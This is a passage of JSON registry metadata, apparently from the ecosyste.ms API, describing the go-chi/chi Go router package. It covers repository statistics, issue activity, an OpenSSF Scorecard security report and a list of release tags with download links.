":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.243Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.115015678513658,"dependent_packages_count":5.730225644084185,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.922620661298922},"purl":"pkg:golang/github.com/go-%21chi/%21chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-Chi/Chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-Chi/Chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-Chi/Chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":3523239,"name":"github.com/go-chi/chi/v4","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"github.com/go-chi/chi","versions_count":10,"first_release_published_at":"2019-01-08T22:33:15.000Z","latest_release_published_at":"2023-09-08T03:59:20.773Z","latest_release_number":"v4.1.2","last_synced_at":"2026-08-12T02:06:17.240Z","created_at":"2022-04-10T22:24:07.845Z","updated_at":"2026-08-12T02:06:17.240Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chi/v4","install_command":"go get github.com/go-chi/chi/v4","documentation_url":"https://pkg.go.dev/github.com/go-chi/chi/v4#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifes